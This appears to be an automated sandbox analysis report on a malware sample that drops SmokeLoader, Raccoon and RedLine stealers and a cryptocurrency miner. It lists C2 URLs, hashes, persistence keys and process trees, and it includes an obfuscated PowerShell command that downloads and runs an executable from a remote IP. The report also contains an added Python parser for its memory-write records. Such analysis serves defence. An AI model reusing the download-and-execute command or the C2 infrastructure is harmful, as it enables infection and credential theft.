Analysis
- max time kernel: 151s
- max time network: 158s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 11-08-2021 20:40

Static task: static1

Behavioral task: behavioral1
- Sample: d4537efd24d9b886648bd32b6ce4da99.exe
- Resource: win7v20210410

Behavioral task: behavioral2
- Sample: d4537efd24d9b886648bd32b6ce4da99.exe
- Resource: win10v20210408
General
- Target: d4537efd24d9b886648bd32b6ce4da99.exe
- Size: 207KB
- MD5: d4537efd24d9b886648bd32b6ce4da99
- SHA1: 1a014d098b8ef7ecef5ec124ddef0030c42da509
- SHA256: 5d372a19bbdae072e4fb4ff9deded30dbb40f4a74b54fbf77888a1523e864129
- SHA512: e0db39cd1165f6d34e33f4a31e71a1ff69f48cf3baf291cf873b91954e608b89dd8a89a4f1cafa279936cf22abf4e901290816d649bcbc143e7977618d6e30e4
Malware Config
Extracted
http://91.241.19.52/Api/GetFile2
Extracted
smokeloader
2020
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Extracted
raccoon
cd8dc1031358b1aec55cc6bc447df1018b068607
- url4cnc: https://telete.in/jagressor_kz
Extracted
raccoon
2ca2376c561d1af7f8b9e6f3256b06220a3db187
- url4cnc: https://telete.in/johnyes13
Extracted
raccoon
471c70de3b4f9e4d493e418d1f60a90659057de0
- url4cnc: https://telete.in/p1rosto100xx
Signatures
-
Process spawned unexpected child process 5 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4924 | 1768 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4224 | 1768 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4964 | 1768 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5008 | 1768 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5036 | 1768 | schtasks.exe
-
Raccoon Stealer Payload 6 IoCs
Processes:
resource | yara_rule
behavioral2/memory/3648-191-0x0000000000400000-0x0000000002CB0000-memory.dmp | family_raccoon
behavioral2/memory/3648-193-0x00000000048B0000-0x0000000004941000-memory.dmp | family_raccoon
behavioral2/memory/4072-194-0x0000000000400000-0x0000000002CB1000-memory.dmp | family_raccoon
behavioral2/memory/4072-188-0x00000000049B0000-0x0000000004A43000-memory.dmp | family_raccoon
behavioral2/memory/4128-243-0x0000000000400000-0x0000000000495000-memory.dmp | family_raccoon
behavioral2/memory/4128-248-0x0000000000400000-0x0000000000495000-memory.dmp | family_raccoon
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\B702.exe | family_redline
C:\Users\Admin\AppData\Local\Temp\B702.exe | family_redline
C:\Users\Admin\AppData\Local\Temp\CCFE.exe | family_redline
C:\Users\Admin\AppData\Local\Temp\CCFE.exe | family_redline
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
description | pid | process | target process
PID 3444 created 4072 | 3444 | WerFault.exe | CFDE.exe
PID 4004 created 3648 | 4004 | WerFault.exe | D26F.exe
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Blocklisted process makes network request 1 IoCs
Processes:
flow | pid | process
35 | 4244 | powershell.exe
-
Downloads MZ/PE file
-
Executes dropped EXE 60 IoCs
Processes:
(60 pid/process rows, grouped here by process name; PIDs are in the order the report lists them)
pid | process
212, 2648 | ADCA.exe
1868, 2100 | ADCA.tmp
2084 | B702.exe
1808 | BB97.exe
852, 4128 | BE96.exe
1816 | fsucenter.exe
2580 | CCFE.exe
4072 | CFDE.exe
3648 | D26F.exe
3492 | Runtimebroker.exe
4784, 4812, 5056 | install.exe
4840 | HostData.exe
3692, 4764, 4856, 4908, 4088, 5080, 4104, 3892, 4216, 2324, 4112, 4308, 2156, 2580, 4368, 2640, 3656, 4512, 4552, 4500, 4620, 3108, 2892, 4740, 4900, 5028, 5096, 4104, 892, 4476, 4280, 4412, 3896, 4248, 4180, 1200, 4128, 2076, 4284, 1868, 852, 2252, 2156 | Database.exe (43 rows)
-
Checks BIOS information in registry 2 TTPs 64 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
(64 rows, collapsed here by registry value and process; every row is "Key value queried")
description | ioc | process | rows
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Database.exe | 37
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Database.exe | 25
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | B702.exe | 1
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | B702.exe | 1
-
Deletes itself 1 IoCs
Processes:
pid | process
3000 | (no process name in report)
-
Drops startup file 1 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk | Runtimebroker.exe
-
Loads dropped DLL 1 IoCs
Processes:
pid | process
1816 | fsucenter.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\B702.exe | themida
C:\Users\Admin\AppData\Local\Temp\B702.exe | themida
behavioral2/memory/2084-141-0x0000000000A80000-0x0000000000A81000-memory.dmp | themida
C:\Users\Admin\AppData\Local\Temp\CCFE.exe | themida
C:\Users\Admin\AppData\Local\Temp\CCFE.exe | themida
behavioral2/memory/2580-178-0x0000000001110000-0x0000000001111000-memory.dmp | themida
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Program Files\\Windows Security\\BrowserCore\\en-US\\explorer.exe\"" | install.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\DtcInstall\\explorer.exe\"" | install.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\B702 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\B702\\B702.exe\"" | install.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\SysWOW64\\twinui\\explorer.exe\"" | install.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Boot\\nb-NO\\smss.exe\"" | install.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://91.241.19.52/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')" | powershell.exe
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
(every row is the same "Key value queried" on the same value; collapsed here by process)
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | B702.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | CCFE.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Database.exe (all remaining rows, one per Database.exe instance)
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 2 IoCs
Processes:
description | ioc | process
File created | C:\Windows\SysWOW64\twinui\explorer.exe | install.exe
File created | C:\Windows\SysWOW64\twinui\7a0fd90576e08807bde2cc57bcf9854bbce05fe3 | install.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Processes:
(64 pid/process rows, collapsed here by process; the report lists three consecutive rows per Database.exe PID)
pid | process | rows
2084 | B702.exe | 1
2580 | CCFE.exe | 1
3692, 4764, 4856, 4908, 4088, 5080, 4104, 3892, 4216, 2324, 4112, 4308, 2156, 2580, 4368, 2640, 3656, 4512, 4552, 4500 | Database.exe | 3 each (60)
4620 | Database.exe | 2
-
Suspicious use of SetThreadContext 3 IoCs
Processes:
description | pid | process | target process
PID 3492 set thread context of 1520 | 3492 | d4537efd24d9b886648bd32b6ce4da99.exe | d4537efd24d9b886648bd32b6ce4da99.exe
PID 852 set thread context of 4128 | 852 | BE96.exe | BE96.exe
PID 4784 set thread context of 4812 | 4784 | install.exe | install.exe
-
Drops file in Program Files directory 3 IoCs
Processes:
description | ioc | process
File created | C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe | install.exe
File opened for modification | C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe | install.exe
File created | C:\Program Files\Windows Security\BrowserCore\en-US\7a0fd90576e08807bde2cc57bcf9854bbce05fe3 | install.exe
-
Drops file in Windows directory 2 IoCs
Processes:
description | ioc | process
File created | C:\Windows\DtcInstall\explorer.exe | install.exe
File created | C:\Windows\DtcInstall\7a0fd90576e08807bde2cc57bcf9854bbce05fe3 | install.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 23 IoCs
Processes:
pid | pid_target | process | target process
1624 | 1808 | WerFault.exe | BB97.exe
2220 | 1808 | WerFault.exe | BB97.exe
3928 | 1808 | WerFault.exe | BB97.exe
3248 | 1808 | WerFault.exe | BB97.exe
204 | 1808 | WerFault.exe | BB97.exe
208 | 1808 | WerFault.exe | BB97.exe
1788 | 4072 | WerFault.exe | CFDE.exe
3604 | 3648 | WerFault.exe | D26F.exe
3644 | 4072 | WerFault.exe | CFDE.exe
2648 | 3648 | WerFault.exe | D26F.exe
3984 | 4072 | WerFault.exe | CFDE.exe
3936 | 3648 | WerFault.exe | D26F.exe
2200 | 3492 | WerFault.exe | Runtimebroker.exe
3476 | 4072 | WerFault.exe | CFDE.exe
4016 | 3648 | WerFault.exe | D26F.exe
2220 | 3492 | WerFault.exe | Runtimebroker.exe
3444 | 4072 | WerFault.exe | CFDE.exe
4004 | 3648 | WerFault.exe | D26F.exe
2636 | 3492 | WerFault.exe | Runtimebroker.exe
3612 | 3492 | WerFault.exe | Runtimebroker.exe
1624 | 3492 | WerFault.exe | Runtimebroker.exe
2200 | 3492 | WerFault.exe | Runtimebroker.exe
208 | 3492 | WerFault.exe | Runtimebroker.exe
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | d4537efd24d9b886648bd32b6ce4da99.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | d4537efd24d9b886648bd32b6ce4da99.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | d4537efd24d9b886648bd32b6ce4da99.exe
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
4224 | schtasks.exe
4964 | schtasks.exe
5008 | schtasks.exe
5036 | schtasks.exe
4924 | schtasks.exe
-
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | fsucenter.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | fsucenter.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
(64 rows, collapsed here by PID)
pid | process | rows
1520 | d4537efd24d9b886648bd32b6ce4da99.exe | 2
3000 | (no process name in report) | 62
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid | process
3000 | (no process name in report)
-
Suspicious behavior: MapViewOfSection 19 IoCs
Processes:
(19 rows, collapsed here by PID)
pid | process | rows
1520 | d4537efd24d9b886648bd32b6ce4da99.exe | 1
3000 | (no process name in report) | 18
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
(64 rows in report order; the PID 3000 rows alternate "Token: SeShutdownPrivilege" and "Token: SeCreatePagefilePrivilege" and are collapsed here into pairs)
description | pid | process | rows
Token: SeShutdownPrivilege / Token: SeCreatePagefilePrivilege | 3000 | (no process name in report) | 19 pairs (38 rows)
Token: SeDebugPrivilege | 2084 | B702.exe | 1
Token: SeRestorePrivilege | 1624 | WerFault.exe | 1
Token: SeBackupPrivilege | 1624 | WerFault.exe | 1
Token: SeDebugPrivilege | 1624 | WerFault.exe | 1
Token: SeDebugPrivilege | 2220 | WerFault.exe | 1
Token: SeShutdownPrivilege / Token: SeCreatePagefilePrivilege | 3000 | (no process name in report) | 4 pairs (8 rows)
Token: SeDebugPrivilege | 3928 | WerFault.exe | 1
Token: SeShutdownPrivilege / Token: SeCreatePagefilePrivilege | 3000 | (no process name in report) | 4 pairs (8 rows)
Token: SeDebugPrivilege | 3248 | WerFault.exe | 1
Token: SeDebugPrivilege | 204 | WerFault.exe | 1
Token: SeShutdownPrivilege / Token: SeCreatePagefilePrivilege | 3000 | (no process name in report) | 1 pair (2 rows)
-
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
pid | process
2100 | ADCA.tmp
-
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid | process
3000 | (no process name in report)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
The "wrote to memory" records below are shown one row per distinct write, with the number of times the report logged that write in the last column (the report lists every call separately). Where the report leaves the process column blank, the cell reads "(blank)".

description | pid | process | target process | logged
PID 3492 wrote to memory of 1520 | 3492 | d4537efd24d9b886648bd32b6ce4da99.exe | d4537efd24d9b886648bd32b6ce4da99.exe | 6x
PID 3000 wrote to memory of 212 | 3000 | (blank) | ADCA.exe | 3x
PID 212 wrote to memory of 1868 | 212 | ADCA.exe | ADCA.tmp | 3x
PID 3000 wrote to memory of 2084 | 3000 | (blank) | B702.exe | 3x
PID 1868 wrote to memory of 2648 | 1868 | ADCA.tmp | ADCA.exe | 3x
PID 2648 wrote to memory of 2100 | 2648 | ADCA.exe | ADCA.tmp | 3x
PID 3000 wrote to memory of 1808 | 3000 | (blank) | BB97.exe | 3x
PID 3000 wrote to memory of 852 | 3000 | (blank) | BE96.exe | 3x
PID 2100 wrote to memory of 1816 | 2100 | ADCA.tmp | fsucenter.exe | 3x
PID 3000 wrote to memory of 2580 | 3000 | (blank) | CCFE.exe | 3x
PID 3000 wrote to memory of 4072 | 3000 | (blank) | CFDE.exe | 3x
PID 3000 wrote to memory of 3648 | 3000 | (blank) | D26F.exe | 3x
PID 3000 wrote to memory of 716 | 3000 | (blank) | explorer.exe | 4x
PID 1808 wrote to memory of 3492 | 1808 | BB97.exe | Runtimebroker.exe | 3x
PID 3000 wrote to memory of 2192 | 3000 | (blank) | explorer.exe | 3x
PID 3000 wrote to memory of 1812 | 3000 | (blank) | explorer.exe | 4x
PID 3000 wrote to memory of 212 | 3000 | (blank) | explorer.exe | 3x
PID 3000 wrote to memory of 2652 | 3000 | (blank) | explorer.exe | 4x
PID 3000 wrote to memory of 1136 | 3000 | (blank) | explorer.exe | 3x
PID 3000 wrote to memory of 1536 | 3000 | (blank) | explorer.exe | 1x
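The records above are easier to reason about as a graph than as a list: the interesting facts are which source PID writes into the most targets, which writes land in a freshly created copy of the same image (the create-suspended-and-overwrite pattern), and which PIDs turn up under two different image names because the sandbox reused them. The script below is an added example, not code from the report; it parses records in the exact layout the report uses and pulls those three facts out. RECORDS is a constructed excerpt of the report's table, not the full list.

```python
"""Turn "PID <src> wrote to memory of <dst> <src> <process> <target>" records into a write graph."""
import re
from collections import Counter, defaultdict

# Constructed excerpt of the report's table (same layout, repeated calls kept as repeated lines).
RECORDS = """\
PID 3492 wrote to memory of 1520 3492 d4537efd24d9b886648bd32b6ce4da99.exe d4537efd24d9b886648bd32b6ce4da99.exe
PID 3492 wrote to memory of 1520 3492 d4537efd24d9b886648bd32b6ce4da99.exe d4537efd24d9b886648bd32b6ce4da99.exe
PID 3000 wrote to memory of 212 3000 ADCA.exe
PID 3000 wrote to memory of 212 3000 ADCA.exe
PID 212 wrote to memory of 1868 212 ADCA.exe ADCA.tmp
PID 3000 wrote to memory of 1808 3000 BB97.exe
PID 1808 wrote to memory of 3492 1808 BB97.exe Runtimebroker.exe
PID 3000 wrote to memory of 716 3000 explorer.exe
PID 3000 wrote to memory of 2192 3000 explorer.exe
PID 3000 wrote to memory of 212 3000 explorer.exe
"""

# description, then the pid column (repeats the source PID), then one or two image names.
_REC = re.compile(r"^PID (\d+) wrote to memory of (\d+) (\d+)((?: \S+)+)$")


def parse_records(text):
    """Return (src_pid, src_image, dst_pid, dst_image) tuples; src_image is '' when left blank."""
    out = []
    for line in text.splitlines():
        m = _REC.match(line.strip())
        if not m:
            continue
        src, dst, src_again, names = m.groups()
        assert src == src_again, line
        parts = names.split()  # image names in this report carry no spaces
        src_img, dst_img = (parts[0], parts[1]) if len(parts) == 2 else ("", parts[0])
        out.append((int(src), src_img, int(dst), dst_img))
    return out


def write_edges(records):
    """Distinct edges with how many times each write was logged."""
    return Counter(records)


def self_injections(records):
    """Writes whose source and target share an image name: a process overwriting a copy of itself."""
    return sorted({(s, d, si) for s, si, d, di in records if si and si == di})


def fan_out(records):
    """Number of distinct target PIDs each source PID wrote into."""
    targets = defaultdict(set)
    for s, _, d, _ in records:
        targets[s].add(d)
    return {s: len(t) for s, t in targets.items()}


def hub_pid(records):
    """The source PID with the most distinct targets, i.e. the process that stages everything else."""
    fo = fan_out(records)
    return max(fo, key=fo.get) if fo else None


def reused_pids(records):
    """PIDs seen under more than one image name (PID reuse inside the run)."""
    by_pid = defaultdict(set)
    for s, si, d, di in records:
        if si:
            by_pid[s].add(si)
        by_pid[d].add(di)
    return {pid: sorted(imgs) for pid, imgs in by_pid.items() if len(imgs) > 1}


if __name__ == "__main__":
    recs = parse_records(RECORDS)
    print("hub:", hub_pid(recs), "fan-out:", fan_out(recs))
    print("self-injections:", self_injections(recs))
    print("reused PIDs:", reused_pids(recs))
```

On the excerpt, PID 3000 is the hub even though it never appears in the process tree, 3492 writes into a suspended copy of the original sample, and 3492 and 212 each show up under two image names, which is why the same number in the tree and in the write table can name different processes.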
Processes
-
C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe"C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe"C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\ADCA.exeC:\Users\Admin\AppData\Local\Temp\ADCA.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-RGE0R.tmp\ADCA.tmp"C:\Users\Admin\AppData\Local\Temp\is-RGE0R.tmp\ADCA.tmp" /SL5="$40116,4193427,831488,C:\Users\Admin\AppData\Local\Temp\ADCA.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ADCA.exe"C:\Users\Admin\AppData\Local\Temp\ADCA.exe" /VERYSILENT3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-9AFQ8.tmp\ADCA.tmp"C:\Users\Admin\AppData\Local\Temp\is-9AFQ8.tmp\ADCA.tmp" /SL5="$6005E,4193427,831488,C:\Users\Admin\AppData\Local\Temp\ADCA.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\install.exe"C:\ProgramData\Data\install.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\ProgramData\Data\install.exe"C:\ProgramData\Data\install.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
-
C:\ProgramData\Data\install.exe"C:\ProgramData\Data\install.exe"8⤵
- Executes dropped EXE
-
C:\ProgramData\Systemd\HostData.exeNULL6⤵
- Executes dropped EXE
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
